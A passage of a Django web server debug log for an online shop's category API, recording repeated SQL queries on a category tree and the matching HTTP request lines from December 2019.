"shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:41:38] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:42:17,021 utils 11259 139831538779904 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:42:17,029 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:42:17] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:42:17,058 utils 11259 139831538779904 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 11:42:17,065 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 11:42:17,069 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 11:42:17,073 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 11:42:17,077 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 11:42:17,081 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 11:42:17,085 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 11:42:17,089 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 11:42:17,093 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 11:42:17,097 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 11:42:17,101 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 11:42:17] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 11:42:43,952 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:42:43,960 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:42:43] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:42:43,991 utils 11259 139831538779904 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 11:42:43,998 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 11:42:44,001 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 11:42:44,006 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 11:42:44,011 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 11:42:44,015 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 11:42:44,019 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 11:42:44,024 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 11:42:44,028 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 11:42:44,032 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 11:42:44,037 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 11:42:44] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 11:42:53,883 utils 11259 139831538779904 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:42:53,891 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:42:53] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:42:53,923 utils 11259 139831538779904 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 11:42:53,931 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 11:42:53,935 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 11:42:53,939 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 11:42:53,942 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 11:42:53,946 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 11:42:53,950 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 11:42:53,954 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 11:42:53,958 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 11:42:53,962 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 11:42:53,965 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 11:42:53] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 11:43:36,896 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 11:43:36,901 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [13/Dec/2019 11:43:36] "GET /api/v1/categories/10 HTTP/1.0" 200 181 DEBUG 2019-12-13 11:43:36,935 utils 11259 139831538779904 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 11:43:36,939 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 11:43:36,941 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 11:43:36,943 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 11:43:36,946 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 11:43:36,948 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 11:43:36,950 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 11:43:36,953 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 11:43:36,955 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 11:43:36,957 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 11:43:36,960 utils 11259 139831538779904 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 11:43:36] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 11:45:48] "GET / HTTP/1.0" 302 0 [13/Dec/2019 11:50:50] "GET / HTTP/1.0" 302 0 [13/Dec/2019 11:55:53] "GET / HTTP/1.0" 302 0 Not Found: /.well-known/security.txt [13/Dec/2019 11:59:51] "GET /.well-known/security.txt HTTP/1.0" 404 6665 [13/Dec/2019 12:01:16] "GET / HTTP/1.0" 302 0 [13/Dec/2019 12:07:01] "GET / HTTP/1.0" 302 0 [13/Dec/2019 12:12:04] "GET / HTTP/1.0" 302 0 [13/Dec/2019 12:17:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 12:20:33,239 utils 11259 139831538779904 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 12:20:33,247 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 12:20:33,251 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 12:20:33,255 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 12:20:33,259 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 12:20:33,263 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 12:20:33,267 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 12:20:33,271 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 12:20:33,275 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 12:20:33,279 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 12:20:33,283 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 12:20:33] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 12:20:43,755 utils 11259 139831538779904 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 12:20:43,762 utils 11259 139831538779904 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [13/Dec/2019 12:20:43] "GET /api/v1/categories/6 HTTP/1.0" 200 181 DEBUG 2019-12-13 